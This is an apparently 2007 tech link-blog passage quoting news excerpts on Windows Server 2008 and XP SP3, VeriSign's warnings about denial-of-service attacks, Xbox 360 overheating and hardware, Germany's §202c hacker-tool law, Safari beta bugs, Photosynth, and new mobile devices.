When NAP's inclusion in WS2K8 was first confirmed in late August, a Microsoft spokesperson contacted BetaNews to make sure we reported it wasn't just for Windows Server and just for Vista. We assumed that meant it would find its way to XP as well, though the spokesperson declined to be pressed further at that time.

A one-two punch involving a rollout of WS2K8 and XP SP3 in the first half of next year -- which is Microsoft's current plan -- could pave the way for a hardening of endpoint security on Windows networks, at least somewhat. Contributing to that hardening will be the inclusion of new cryptographic algorithms in the kernel, by means of Kernel Mode Cryptographic Module (KMCM). Coupled with access policies provided by NAP, admins could theoretically implement a new, second layer of policies for encrypted communications and authentication between network peers, provided by Triple-DES algorithms accessible through the kernel.

In other words, enterprises that previously have had trouble embracing the idea of deploying across-the-board encryption may feel more comfortable trying it out, now that KMCM is a baseline feature. It premiered in Windows 2000, and its first implementation in a Windows client was for the first edition of Vista.

Neosmart also discovered evidence of hardening of Windows' IP stack, including the inclusion of Microsoft's new "black hole router" detection scheme. Way back in 1990, the IETF implemented a way for routers to detect in advance the shortest path to send a large number of datagrams, without having to fragment them too seriously along the way. The plan was referred to as Path Maximum Transmission Unit (PMTU), with the objective being for sending routers to seek receiving routers that mangle fewer datagrams.

As it turned out, some receiving routers that were pegged by sending ones as PMTU members were responding to datagrams with "do not fragment" messages by simply throwing them out. These were referred to as "black hole routers," and have been a perennial plague to streaming operations. The new router detection scheme enables IP routers along the way to flag misbehaving PMTU candidates in advance and steer around them.

This is a feature that Microsoft has updated just last month, and which it might not have had to include with XP SP3 to please customers. So its inclusion is being treated as an indication there are developers at Microsoft who are still willing to treat XP seriously, perhaps extending its viable lifetime well into 2009.
[/QUOTE]

Source: http://www.betanews.com

| Trackback | # 
 Thursday, September 27, 2007
Thursday, September 27, 2007 12:44:33 AM UTC ( EN | internet | tech )

[QUOTE]
Denial-of-service attacks are growing faster than bandwidth is being added to the internet, according to VeriSign, the company that administers the .com domain.

Criminal groups selling services online are increasingly threatening the fabric of the internet, as the size of the compromised networks of computers they control increases, according to VeriSign.

The company claimed that a successful denial-of-service (DoS) attack against VeriSign could bring down the internet. "There are attacks attempting to shut down our servers," said Ken Silva, VeriSign's chief security officer. "This would effectively shut down the internet."

Silva said that although DoS attacks are difficult to trace, there are "a couple of well-known groups in Russia, China and Romania" that may be acting with their government's knowledge. "It would be hard to imagine groups who have this much activity going unnoticed by their governments," he said.

The chief security officer said that VeriSign "hoped to get smarter" in blocking malicious traffic. "We can continue to add bandwidth, but ultimately 20 years down the road, this can't continue as a footrace. The internet as a whole has to get smarter in denying DoS attacks."

VeriSign is currently upgrading its infrastructure in a scheme called Project Titan. This has included adding bandwidth, but it is also monitoring its systems more closely.

"Our monitoring systems now resemble those for the space shuttle," said Silva. "We monitor the capability of our CPUs and memory allocation on all of our servers. We're predicting what problems will occur rather than waiting for them to occur."

Many public-sector organisations in the UK suffer from DoS attacks. The Probation Service has upgraded its servers in the past week to cope with the traffic created by botnets, according to a security manager for the Probation Service.

"We've had to upgrade our hardware in the last week to cope with an unexpected increase in the volume of malicious traffic at the network gateway," the security manager told ZDNet.co.uk. "Simply coping with that is compromising our ability to run our business. The problem is simply coping with what is coming at us."

Tim Pickett, a former technical security analyst at AOL, said that ISPs should monitor their networks to mitigate DoS attacks. "ISPs should be monitoring what's going through their networks," said Pickett. "More should be done to tackle the problem on the ISP side."

[/QUOTE]

Source: http://news.zdnet.co.uk

| Trackback | # 
 Thursday, August 02, 2007
Thursday, August 02, 2007 12:15:29 PM UTC ( EN | microsoft | tech | xbox )

[QUOTE]
The Xbox 360's power was about 170 W when the DVD equipment was running. The temperature of emitted air was about 45C. A temperature gap with the room temperature (23°C) was 22°C.

"When designing consumer products, it is common to seek a temperature gap of around 10°C between exhaust and room temperatures," the thermal design expert said. "The 22°C is quite a large gap, in the first place."

The cooler fan's maximum wind speed was 1.1 m/s, only 1/2 to 1/3 compared with general desktop PCs. It may be partly because the fan rotation was reduced to lower noise. According to an expert's analysis, "The amount of switched air is slightly in short considering the chassis' size (309 x 258 x 83 mm3)."


Located at front end is the graphics LSI heat sink.
At the back is the microprocessor heat sink equipped with a heat pipe


To confirm the cooler system's performance, we measured the temperature of heat sinks. Attaching ends of a thermocouple to each heat sink for the microprocessor and graphics LSI, we closed the chassis and then switched on the Xbox 360.
In only five minutes since we started playing the game, the temperature of the heat sink on the graphics LSI rose to 70°C. The thermal gradient was about 10°C/min.

In 15 minutes, the microprocessor heat sink temperature stabilized at 58°C, but the heat sink on the graphics LSI rose to 80°C, 57°C above the room temperature.

Assuming room temperature of 35°C in mid-summer, the gap is estimated to reach more than 90°C. In that case, the temperature of chips in the graphics LSI could exceed 100°C.

We measured the temperature in good cooling environments, removing dust and obstacles from the vent hole, for example. If the cooling performance lowers with the vent hole choked up or the duct moved over, the LSI's temperature could get even higher.
[/QUOTE]

Full Story: techon.nikkeibp.co.jp

| Trackback | # 
 Friday, July 27, 2007
Friday, July 27, 2007 10:55:00 AM UTC ( EN | markets | microsoft | tech | xbox )

[QUOTE]
As Microsoft meets with financial analysts today, discussing its prospects in areas including consumer products, one subject clearly on the minds of analysts is the recent $1 billion charge taken by Microsoft from Xbox 360 malfunctions.

Microsoft CEO Steve Ballmer addressed the topic on stage: "We have to learn from our mistakes. It was painful to announce the write-off that we had to announce, and yet we knew we had to take care of our customers," he said. He promised that Microsoft will be "world-class when we do hardware."
[/QUOTE]

Full Story: seattlepi.nwsource.com

| Trackback | # 
Friday, July 27, 2007 10:54:00 AM UTC ( EN | science | tech )

[QUOTE]
According to Gates, there are currently six trends, which will be determining Microsoft and its product strategy for the years to come. In a rather unusual way, he mentioned the dramatic changes in the way the hardware engines that will be fueling new applications are engineered.

The fact that performance advances have shifted from a pure increase of clock speed to increased parallelism was described by Gates as a "challenge". He believes that "parallel execution will be the primary way silicon power will be delivered" down the road and not so much the fact that there is more clock speed available. According to Gates, microprocessors will get to 10 GHz, "but not much further" (...) "even 5 to 6 years out."
[/QUOTE]

Full Story: tgdaily.com

| Trackback | # 
 Wednesday, July 11, 2007
Wednesday, July 11, 2007 9:48:06 PM UTC ( EN | internet | markets | microsoft | tech )

At Microsoft's Worldwide Partner Conference, CEO Steve Ballmer gave a few more details about the company's move toward hosting services.

[QUOTE]
Microsoft's top executive outlined the company's plan to transition from a traditional software company to offering software plus services for the first time on Tuesday, giving some roadmap details for how the strategy will play out in the next year.

In a keynote at the Worldwide Partner Conference in Denver, Microsoft CEO Steve Ballmer shed more details on the plan other executives, such as Chief Software Architect Ray Ozzie, have been teasing out over the past year -- but not many more. He gave a time frame for the early part of the transition but mostly echoed what other executives have said about Microsoft's slow transition to adding hosted business services to its traditional software portfolio.

"For software plus services, the time is now," Ballmer said, finishing off the first of a raft of keynotes on the first day of Microsoft's annual partner conference. He said that over the next year, Microsoft will continue to sell mostly on-premises software, but there will be more evidence of the transition to its hybrid model as the year goes on.

Since Microsoft began talking about its plan to gradually transition to offering more hosted services last year in a speech by Ozzie at its TechEd Conference in Boston, many noted that the company had no choice. With such an entrenched business in enterprise and consumer desktop software, it would be impossible for Microsoft to be as nimble in offering hosted services as rivals like Google and Salesforce.com, which started their businesses as Web-based services providers. And a warmer reception for hosted services is clearly the direction the enterprise market is heading as businesses become more comfortable accessing Web-based services beyond the traditional consumer staples of e-mail and search that have been popular for years.

The transition to providing more services will touch every part of Microsoft's business, but some changes will be more obvious than others, Ballmer said. The user interface will be an important place for innovation in this area, and Microsoft's Silverlight technology is the cornerstone of that, he said. Microsoft introduced Silverlight, a browser plug-in that allows for rich video and interactive media experience to be delivered within Web sites, in April.

A solid services platform on which partners can build services and also that they can resell with Microsoft managing and hosting them also will be a clear sign of the transition, Ballmer said. Microsoft already is offering a combination of consumer-oriented services, such as Windows Live Hotmail and Windows Live Local Search, but will begin bulking up its portfolio of enterprise services as well, he said.

Microsoft already has unveiled business services like Exchange Hosted Services for enterprise messaging and Office Live hosted service for small businesses. There will be new and expanded services like these as Microsoft progresses further with its software plus services strategy, Ballmer said.
[/QUOTE]

Found on: www.infoworld.com

| Trackback | # 
Wednesday, July 11, 2007 8:39:22 AM UTC ( EN | games | microsoft | tech | xbox )

[QUOTE]
The Microsoft pre-E3 Press Briefing has now ended, I quickly encoded a low-res/quality flv video below (re-cutting it took too much time, so briefing starts at ~01:57). Microsoft will offer a HD video download of the briefing tomorrow. You can also already download the MP3 of the briefing on majornelson.com. Realtime transcripts of the event are available on eurogamer.net or engadget/joystiq.


Video of the 2007 Pre-E3 Press Briefing by Microsoft
from tuesday July 10th 8:30pm PST in Santa Monica, California.

Some highlights:

  • Briefing starts with lots of marketing stuff like marketshare, high attach rate, online purchases, live members (over 7 millions now) etc ... I'll pass.
  • Only the xbox360 will have all 3 of biggest titles this holiday season (GTA IV, Madden 08 and Halo 3).
  • New controller sold with game called 'Scene it' (based on the boardgame). Buzz-style button on the top, and the face buttons positioned in a line below.
  • Sonic the Hedgehog and Golden Axe now available on XBLA.
  • Microsoft will distribute Disney movies on marketplace in HD, starting tonight.
  • By end of the year, video marketplace available in Canada and Europe too.
  • Xbox 360 Elite coming to Europe on August 24th 2007.
  • PGR4 demo shown, now also bikes. Coming in September. Also new demo of Lost Odyssey, also coming this year ... actually all games they show tonight will be coming out this year.
  • Blue Dragon demo out on Xbox Live tonight.
  • Viva pinata and Gears of War (with editor, new levels, etc) coming to Games for Windows.
  • Demo and presentation of Call of Duty 4. Real-time playable demo shown, takes place near Chernobyl. Beta demo coming exclusive to Xbox360.
  • Next Splintercell (called 'Conviction') coming exclusive to xbox 360.
  • New GTA IV trailer shown. First 2 trailers were captured from a 360, not PS3.
  • Capcom's Resident Evil 5 coming to Xbox360 too, not this year though.
  • New demo of Assassins Creed by Ubisoft. Coming November 2007.
  • Video of the 'Halo 3 universe' shown.
  • Gray Xbox360 is real! It's actually more 'army green'. Will be a Halo 3 themed Special Edition console coming in September! DVD-bezel and HDD sides will be gold colored instead of silver.

Xbox 360 Halo3 Special Edition

  • Ending briefing with another Halo 3 trailer!
  • What we didn't get: price cut, MGS4 or FF XIII.

Here's the official press release of the E3 Briefing: LINK
[/QUOTE]

Found on: www.xbox-scene.com

| Trackback | # 
 Tuesday, July 10, 2007
Tuesday, July 10, 2007 7:34:18 AM UTC ( EN | markets | microsoft | tech | xbox )

[QUOTE]
Here's a trade secret that Microsoft is unlikely to publicly acknowledge. Sony's cutting the price on the PlayStation 3. How will Microsoft react? We'll find out soon. But a key part of the strategy is going to be a project code-named Falcon.

Falcon is the name for the latest internal electronics in the Xbox 360. It will have an IBM microprocessor and an AMD/ATI graphics chip that are manufactured in a 65-nanometer production process. These are cost-reduced chips that do the same thing as their 90-nanometer predecessors, but they're smaller.
Microsoft is in the process of qualifying the new Falcon chips and motherboard this summer. I expect it will launch Xbox 360s with the new Falcon innards this fall. That is why the company has been able to say that it has solved its manufacturing quality problems. Microsoft is likely to spend a little more money on heat sinks to make sure that the overheating problem doesn't resurface with Falcon.

The good thing about the smaller chips is that they will likely be easier to make in mass quantities and they shouldn't fail as often. Quality should automatically go up. That's what folks said about the 90-nanometer generation. But the 65-nanometer production process is a known quantity at this point at places such as IBM for sure and possibly at other suppliers such as Taiwan Semiconductor Manufacturing Co. So rather than fix the problems with the 90-nanometer machine, Microsoft has the easier problem now of getting a 65-nanometer machine to work right. I suspect that is why Robbie Bach, president of the Entertainment & Devices group, said on Thursday on a conference call with analysts that the company has "its hands around it at the engineering level."
[/QUOTE]

Found on: www.xbox-scene.com
Full Story: mercurynews.com

| Trackback | # 
 Monday, July 09, 2007
Monday, July 09, 2007 11:03:43 AM UTC ( DE | tech )

Den umstrittenen Plänen der Bundesregierung zum "Strafrechtsänderungsgesetz zur Bekämpfung der Computerkriminalität" hat nach dem Bundestag nun auch der Bundesrat zugestimmt. Hacker und Informatiker hatten die geplante Regelung heftig kritisiert, sehen sie die Arbeit von Sicherheitsexperten und auch die universitäre Lehre doch bedroht und kriminalisiert.

[QUOTE]
Für Kritik sorgt vor allem die Einführung des § 202c StGB "Vorbereiten des Ausspähens und Abfangens von Daten". Demnach macht sich strafbar, wer "Passworte oder sonstige Sicherungscodes, die den Zugang zu Daten (§ 202a Abs. 2) ermöglichen, oder [...] Computerprogramme, deren Zweck die Begehung einer solchen Tat ist, herstellt, sich oder einem anderen verschafft, verkauft, einem anderen überlässt, verbreitet oder sonst zugänglich macht" und riskiert bis zu ein Jahr Freiheitsstrafe.

Dabei gilt als Straftat nach § 202b, wenn jemand "sich oder einem anderen unbefugt unter Anwendung von technischen Mitteln nicht für ihn bestimmte Daten (§ 202a Abs. 2) aus einer nichtöffentlichen Datenübermittlung oder aus der elektromagnetischen Abstrahlung einer Datenverarbeitungsanlage verschafft". Der geänderte § 202a stellt unter Strafe, sich oder einem anderen unbefugt "Zugang zu Daten, die nicht für ihn bestimmt und die gegen unberechtigten Zugang besonders gesichert sind, unter Überwindung der Zugangssicherung" zu verschaffen.

Diese Formulierung kritisierte unter anderem die Gesellschaft für Informatik (GI), weil Programme darin nicht nach ihrer Einsatzart, sondern vielmehr nach ihrem Aufbau definiert werden. Es würde also nicht mehr zwischen Anwendungen zur Begehung von Straftaten und solchen für legale Zwecke unterschieden. So führe der gewählte Wortlaut zu einer Kriminalisierung der heute in allen Unternehmen, Behörden und von Privaten verwendeten Programme zur Aufdeckung von Sicherheitslücken in IT-Systemen. Dies betreffe also Programme und Tools, die zur Absicherung gegen Angriffe unverzichtbar seien.

Der Chaos Computer Club (CCC) hatte bereits im September 2006 gewarnt, der Gesetzentwurf stelle die Arbeitsgrundlagen von Sicherheitsberatern und Netzwerkexperten unter Strafe, da eben bereits der Besitz und die Verbreitung von Werkzeugen zur Netzwerkanalyse und zur Aufdeckung von Sicherheitslöchern in Rechnersystemen strafbar wären. Die Arbeit der Sicherheitsexperten sei damit kaum mehr möglich und von ungerechtfertigter Kriminalisierung bedroht.

CCC-Sprecher Andy Müller-Maguhn hatte die Pläne harsch kritisiert: "Dieser Gesetzentwurf wird nicht gegen Computerkriminalität helfen. Stattdessen werden der IT-Sicherheitsbranche dringend benötigte Werkzeuge zur Aufdeckung von Schwachstellen aus der Hand geschlagen. [...] Die Vorstellungen des Gesetzgebers zeugen von einer ausgeprägten Unkenntnis der technischen Vorgehensweisen. Testangriffe zum Auffinden von Sicherheitslöchern sind für die IT-Sicherheit wie Crashtests für die Autoindustrie. Niemand käme auf die Idee, Crashtests zu verbieten."

Der Bundesrat hatte in seiner Stellungnahme vom 3. November 2006 auf die Gefahr hingewiesen, dass durch eine weite Tatbestandsfassung auch Handlungen unter Strafe gestellt werden könnten, bei denen dies gar nicht beabsichtigt sei. Beispielsweise würde sich nach dem Entwurf wohl strafbar machen, wer sich Zugang zu dem von seinem Kind verschlossenen MP3-Player verschafft, um die darauf gespeicherten Musikstücke anzuhören, so der Bundesrat damals.

Die Bundesregierung aber sah dies anders und erklärte, die vom Bundesrat angesprochenen Fälle der bloßen Ingebrauchnahme von gesicherten elektronischen Geräten gegen den Willen des Berechtigten würden durch das Tatbestandsmerkmal der "besonderen Zugangssicherung" aus dem Anwendungsbereich des § 202a StGB herausgefiltert, die nicht geändert werde.

Auch die Befürchtung des Bundesrats, dass auch der gutwillige Umgang mit Softwareprogrammen zur Sicherheitsüberprüfung von IT-Systemen von § 202c StGB-E erfasst werde und damit strafbar sein könnte, sei nicht begründet, so die Bundesregierung damals. Sie ist der Meinung, der gutwillige Umgang mit Softwareprogrammen zur Sicherheitsüberprüfung von IT-Systemen sei nicht erfasst. So sei ausgeschlossen, dass Computerprogramme erfasst werden, die beispielsweise der Überprüfung der Sicherheit oder Forschung in diesem Bereich dienen.

Vielmehr werden lediglich das Herstellen, Verschaffen und Verbreiten von Programmen unter Strafe gestellt, "denen die illegale Verwendung immanent ist, die also nach Art und Weise des Aufbaus oder ihrer Beschaffenheit auf die Begehung von Computerstraftaten angelegt sind". Bei Programmen, deren funktionaler Zweck nicht eindeutig ein krimineller sei und die erst durch ihre Anwendung zu einem Tatwerkzeug eines Kriminellen oder zu einem legitimen Werkzeug werden, sei der "objektive Tatbestand des § 202c StGB-E nicht erfüllt". IT-Experten sehen dies anders und hatten die Regelungen bis zuletzt kritisiert.
[/QUOTE]

Quelle: www.golem.de

| Trackback | # 
 Thursday, July 05, 2007
Thursday, July 05, 2007 11:35:35 AM UTC ( EN | internet | tech )

The World Wide Web Consortium (W3C) ( http://newsletter.infoworld.com/t?ctl=180648E:B6DDBA76EF261945A84BC0BE80271078EFF29049075316B4 ) is announcing Wednesday that it has completed work on the WSDL 2.0 Web services standard, which expands HTTP and SOAP support for Web applications.

More: http://newsletter.infoworld.com/t?ctl=180647F:B6DDBA76EF261945A84BC0BE80271078EFF29049075316B4

| Trackback | # 
 Monday, June 25, 2007
Monday, June 25, 2007 2:47:01 PM UTC ( EN | markets | microsoft | tech | vista )

[QUOTE]
Six months is a much more interesting time frame, and gives us the opportunity to see if the early trend indicators are holding up, or if the early signs of progress were a short-term gain.  Also, I thought it was worth going a little deeper in the analysis to look at the total fixed and unfixed vulns as I did last time, plus these additional views:

  • Include a comparison view of Linux distribution workstation builds that exclude vulnerabilities non-default optional components as well as OpenOffice and other applications that do not have equivalents on Windows XP.
  • Include a comparison view that excludes Low and Medium severities to just focus on High severity vulnerabilities fixed and unfixed in the first 6 months, and
  • A comparison view that combines both of these

For the full details, or to print the report, you can download the report in pdf.

For those that only want the executive summary, here is a key chart that shows the publicly disclosed High severity vulnerabilities during the first 90 days of availability, broken down by vulns fixed and vulns unfixed.  Note that this chart is showing the reduced Linux builds that exclude non-default and optional components without equivalents on WIndows.  (clicking the chart also gets you to the full report.)

High Severity Vulns, Fixed and Unfixed in First 6 Months of Windows, Red Hat, Novell SUSE, Ubuntu, Apple Mac

The results of the analysis show that Windows Vista continues to show a trend of fewer total and fewer High severity vulnerabilities at the 6 month mark compared to its predecessor product Windows XP (which did not benefit from the SDL) and compared to other modern competitive workstation OSes (which also did not benefit from an SDL-like process).

If you share the opinion that Windows and applications ported to Windows get a higher level of researcher scrutiny than other OSes, then the 6-month results are even more positive.  If you don't share that opinion, then they still stand on their own ...
[/QUOTE]

Found: http://blogs.csoonline.com/

| Trackback | # 
 Thursday, June 21, 2007
Thursday, June 21, 2007 10:20:01 AM UTC ( EN | microsoft | tech | xbox )

>> The Xbox360 Elite has been out for a while now in the North-America, but Eurogamer.net posted a detailed review of the new hardware today:

[QUOTE]
On the one hand, the core issue that most gamers had with the machine has barely been addressed. Yes, the machine is tangibly quieter than the current unit, but it's still loud when running a game from the DVD-ROM. It's also still a lottery as to which drive you'll end up getting, with the BenQ unit being a little less noisy than the Hitachi. However, the notion that there should be any disparity at all between any given system is crazy in the first place. Why not one use one supplier with a quiet drive? The stupidly large power block is unchanged too - another aesthetically hideous aspect of the 360 that I really wanted Microsoft to do something about.

The jury's also out on reliability. The Elite is a little quieter and hopefully the tweaked cooling solution will help the machines last longer. But the bottom line is that the same components are still pumping out the same amount of heat and historically that has not been good news for reliability. That being the case, we're inclined to ask where the 65nm revision of the PowerPC CPU has got to? It's not in the Elite, that's for sure.

However, on the plus side, I can't help but really like the new console. A lot. I've always admired Microsoft's philosophy of bringing HD gaming to as wide an audience as possible. Every HD-ready plasma and LCD has a component port, but with the 360 launch they went one better and provided VGA support - opening up a whole new range of potential new HD gaming screens for their system, or just freeing up an extra port on well-specified displays.

With the Elite, they've done it again with a brilliant quality digital output that works beautifully on any screen you plug it into, be it a low budget GBP 100 Chinese LCD monitor or a GBP 3,000 Panasonic 1080p plasma. Microsoft has stripped away the copy protection nonsense that plagues PS3's digital output and made exceptional picture quality available to gamers no matter what kind of equipment they use.

In many ways, the HDMI port and the bigger hard disk makes this the machine that the launch unit really should have been. However, I find it hard to recommend the Elite as an upgrade to a current model as all the evidence suggests that pumping the cash into an improved display gets you all the picture quality you could ever want from the current system.
[/QUOTE]

Full Story: eurogamer.net (7 pages)
Found on: xbox-scene.com

| Trackback | # 
 Wednesday, June 20, 2007
Wednesday, June 20, 2007 12:23:25 PM UTC ( EN | markets | tech )

[QUOTE]
Blockbuster's decision to support Blu-ray in all of its 1,450 stores is having a bigger impact than it seems. A tipster at an unnamed retailer tells us they've had more HD DVD player orders canceled over the last few days than they've seen over the entire life cycle. The kicker? All of them were canceled because of the Blockbuster announcement. Not only that, new sales of HD DVD players are nonexistent, with Blu-ray being the only things moving now.
[/QUOTE]

Source: gizmodo.com

| Trackback | # 
Wednesday, June 20, 2007 12:20:54 PM UTC ( coolstuff | EN | internet | microsoft | tech )

[QUOTE]
BERKELEY, California -- Two technologies demonstrated at the International Virtual Reality Photography Conference over the weekend come close to delivering the amazing imaging technologies used in Blade Runner to zoom deep into pictures and explore them from different angles.

Both developed by Microsoft, one application allows viewers to zoom deep into gigantic, gigapixel panoramic images. A sweeping view of downtown Seattle and the Puget Sound can be enlarged to show diners sitting in the Space Needle. Another application constructs 3-D objects from hundreds of ordinary 2-D photographs, allowing the object to be explored from any angle.

The most impressive demonstration at Sunday’s IVRPC seminar was Photosynth from Microsoft Live Labs -- a program that constructs large-scale, 3-D models of objects like buildings from hundreds of still photographs.

Using a mouse, viewers can walk in -- and around -- the 3-D model, looking at the object from almost any angle. Viewers can isolate individual shots, and quickly zoom into the tiniest details with a roll of the mouse scroll wheel. (Online demos available here require Windows XP SP2 or Vista).

One reconstructed scene showed the Trevi fountain in Rome, stitched together from 350 photographs scraped from Flickr. The immersive scene incorporated images shot with everything from cell-phone cameras to high-end SLRs.

Another 3-D panorama reconstructed the lavish Gyeongbokgung palace in Seoul, Korea, integrating both professional shots and photographs submitted by amateurs.

“You can actually jump into the images,” remarked Drew Steedly, a scientist with Microsoft Live Labs.

Photosynth uses a visual algorithm to scan through hundreds of images, hunting for distinctive features. After identifying features common to different pictures -- doors, windows and sculptures -- the program links the photos together and calculates the 3-D position of each picture.

The technique is similar to depth perception -- where the brain combines different views from each eye into one seamless 3-D view. In Photosynth, the system establishes a "point-cloud" for each photograph space, and then stitches the latticework of images to create a dazzlingly seamless three-dimensional interactive environment ready for exploration.

"We’re working on releasing something where you could make your own collection,” said Steedly, although when pressed, he admitted there's no timetable for the public rollout of Photosynth.

Matt Uyttendaele of Microsoft Research showed off HD View, a high-definition panoramic viewer that can handle monster panoramic shots, often several gigapixels big.

The browser-based viewer provides an immersive wide-angle view, up to 360 degrees, and is capable of displaying images composed of billions of pixels. (Again, the technology requires XP or Vista).

The sweeping panorama of Seattle was composed of 800 images taken with a zoom camera mounted on a motorized telescope tripod. The tripod stepped the camera across the panorama as it captured a mosaic of 20 megapixel images.

"Its pretty amazing, details in the JPEG images that you don’t even realize are there," said Uyttendaele. "It’s just another dimension to exploring these really large images."

Currently available only for Windows, a new version of HD View will be released in a few weeks that adds tone mapping, which sharpens images by automatically removing atmospheric haze.

“We’re encouraging people to try this out if they want,” said Uyttendaele.
[/QUOTE]

Source: http://www.wired.com

| Trackback | # 
 Tuesday, June 12, 2007
Tuesday, June 12, 2007 5:50:28 PM UTC ( EN | internet | tech )

[QUOTE]
Apple is becoming a favorite target of security researchers these days. In April, there was the $10,000 CanSecWest hack a Mac contest, and on Monday, there was the Safari Web browser. Or the public beta of Safari for Windows, anyway.

Just hours after Apple released its first Windows beta of Safari, researcher Aviv Raff said he'd found a bug.

In an interview, Raff said that it took about three minutes of fuzzing to find the bug and that he hadn't tested the issue on Mac OS X. So he couldn't say whether or not it affected Safari on Windows only. The bug causes the browser to crash and "might be exploitable," according to Raff, meaning it could possibly be used to run malware on the PC.

Raff was clearly unhappy with Apple's claim that Safari was designed to be "secure from day one" (he called this claim "pathetic"), but he said he wasn't particularly going after Apple. "I don't pick just on Apple," he said. "I've posted about Microsoft and Mozilla issues too."

"Everyone has bugs, but not everyone says that they are 'designed to be secured from day one,'" he added. "I guess it's day zero now."
[/QUOTE]

Source: www.infoworld.com

| Trackback | # 
Tuesday, June 12, 2007 8:17:24 AM UTC ( coolstuff | EN | microsoft | tech )

This clip is just a taste of Photosynth Technology. The possibilities of the uses of this program are endless...the speaker barely scrapes the surface.

| Trackback | # 
 Saturday, June 09, 2007
Saturday, June 09, 2007 8:23:10 AM UTC ( EN | markets | microsoft | SOA | tech )

[QUOTE]
Billed as "Microsoft's premier annual conference for IT pros and developers," the Microsoft TechEd 2007 show gets under way in Orlando, Fla. Monday, June 4.

Although Microsoft declined an InfoWorld request for a preview of TechEd, a look at the extensive list of sessions reveals Microsoft will focus not only on expected topics such as Windows Server 2008, SQL Server and Silverlight multimedia technology, but also will give a nod to concepts such as SOA, open source and dynamic languages.

The opening keynote on Monday morning will feature Microsoft's Bob Muglia, vice president of the company's Server and Tools business. He will discuss how IT has evolved from a cost center to a strategic asset and how to help an IT department embrace its new role in fueling growth and driving innovation.

In the SOA arena, TechEd features a session that asks, "Will SOA replace ERP?" Microsoft Dynamics applications and BizTalk software will be part of this discussion about "Real World SOA."

Another session entitled, "Open Source Software in Enterprise Development," ponders the role of open source and whether companies can manage licensing and support issues.

TechEd also will feature discussion on the next release of the SQL Server database and how it will evolve to go beyond relational data and OLAP to support digital data types of the future.

Other topics on the agenda include Windows SharePoint Services 3.0, Microsoft System Center Configuration Manager 2007, Java-.Net interoperability and Visual Studio "Orcas," which is the next release of Microsoft's software development platform. Microsoft's ASP.Net AJAX and Windows Communication Foundation technologies also will be featured.
[/QUOTE]

Source: weblog.infoworld.com

| Trackback | # 
 Tuesday, May 29, 2007
Tuesday, May 29, 2007 9:36:05 PM UTC ( EN | tech )

[QUOTE]
Remember the exciting news from last evening? Here it is! As you can imagine, we've seen our share of devices here at BGR, and I personally have combed through almost all. Let's start it off like this…the HTC Kaiser is the best darn Pocket PC I have ever used! It really has everything you have come to expect nowadays. For instance, it's a full Pocket PC running Windows Mobile 6 Professional, which we prefer over the smartphone bastard child. Detailed internal specs include quad-band EDGE, tri-band UMTS/HSDPA, a 3 megapixel autofocus camera, integrated GPS, WiFI, Bluetooth, a full QWERTY 'board, and a unique option that lets you tilt the screen to have it sit on your desk perfectly aimed at you. The Kaiser comes in a little thinner than the HTC TyTN, and a tad bit thicker than the HTC P4350, which at the end of the day doesn't make that much of a difference. The only possible downside at all I could find is that the HTC Kaiser could shave a few ounces off its weight. Nothing to get excited over though! Build quality is fantastic, and the GPS works extremely well. In addition, the 3 megapixel shooter takes wonderful photographs. The general public (sorry guys) should expect the full commercial release around October of this year. I am so going to be the cool kid on the block for a good couple months. Because I'm so in love with this device, we'll get a little more detailed in this mini-review and walk through, check the rest of the HTC Kaiser's highlights after the jump, or if you prefer skip right to the full unboxing gallery below!

UPDATE: Who is up for some good news? After talking with my source again regarding the HTC Kaiser, I questioned him in detail about the release. He got an update from HTC saying that this will actually ship in late July, not October! The HTC Shift should be out in October. Take this as you will, but it's lookin' better and better for everyone by the minute!

Click on over to see the hotness that is the HTC Kaiser, unboxed of course!

Something we can be appreciative of, is the Kaiser's RAM, 128MB of it. 75MB are usable to the user for programs. Incredible! We also have 256MB of ROM as well built right in. HTC has integrated an application called Hubdog which I believe should work on various Pocket PCs. This is a RSS feed reader, podcast downloader, and even a mini blog publishing tool built right in! Right now it looks like it only supports Blogger at the moment, but hopefully that will change. As you'll see from the shots in the unboxing gallery, the HTC Kaiser has a little raised part on the battery cover which says GPS. Not only does this help keep your device from directly touching the surface you rest it on, it also provides just enough space in between the surface and the speaker, to let some of those music waveforms really shine. How is the speaker you ask? Extremely loud and crisp! On screen the device has a constant "H" by the network status bar indicating that HSDPA is in full effect! If you're not the daring type, HTC even gives you the option under settings to turn HSDPA off. Something featured on the HTC TyTN, that did not make it onto the HTC P4350 has reappeared on the Kaiser, and that is a scroll wheel. It is smaller and a little more refined than the TyTN's and does an excellent job at navigating. I really can't express how this phone has surprised me in more ways than one. If I find some other tasty tidbits, you best believe I'll update this post!
[/QUOTE]

Source: www.boygeniusreport.com

| Trackback | # 
Tuesday, May 29, 2007 9:25:32 PM UTC ( EN | microsoft | tech | xbox )

[QUOTE]
What is the XBox 360, exactly? How do you go about designing and building a game console that meets the high standards of today's gamers and handles the computational pressures of today's highly realistic games (think real time physics computation, incredibly rich graphics, etc)? Did you know the XBox 360 team saw into the multi-core future before most anybody else?

Well, who better to talk to about all of this (and more) than Nick Baker. Nick is a hardware engineer and Director who leads the team that thought up the XBox 360 hardware architecture. It's an impressive piece of machinery. In fact, Nick recently won the Outstanding Technical Leadership award for the effort. Here, Nick takes us through the design history and some of the implementation details of the XBox 360. What were some of the design trade-offs? How different is the XBox 360 that you can buy today from what you, Nick and his team were initially thinking?
It's a very interesting story.

We get pretty geeky here, so be prepared to learn a thing or two about game console hardware architecture, the future of XBox 360 as it relates to multi-core, game programming language evolution in the multi-core, and more.
[/QUOTE]

Download/Stream video interview: channel9.msdn.com

| Trackback | # 
 Monday, May 21, 2007
Monday, May 21, 2007 5:28:12 PM UTC ( EN | markets | tech )

[QUOTE]
http://www.blogsmithmedia.com/www.engadget.com/media/2007/05/dell-tablet-latitude.jpgJeff Clarke, Dell Business Product Group SVP/GM didn't have much to say about the new tablet Dell Latitude that's been rumored about for, well, years, but at very least Dell has finally and officially put the rumors to bed. Showing off a sexyslim Dell tablet in a video posted to Dell's blog, the edu / health / corporate-aimed unit will be"one of the lightest weight convertible tablets in the marketplace... [with] leadership tech in its pen and touch interfaces." Quick recap what is confirmed:

· Dell's doing a widescreen convertible tablet

· It looks pretty thin

· It's got a touchscreen and pen input (digitizer); it also has a biometric reader.

· It's coming out "later this year".

Wish we had more info than that, but we tip our hats to Dell for helping us finally put an end all the years of agonizing and rumor-mongering about this mythic lappie of theirs.
[/QUOTE]

Source: www.engadget.com/

| Trackback | # 
 Saturday, May 19, 2007
Saturday, May 19, 2007 10:01:53 AM UTC ( EN | SOA | tech )

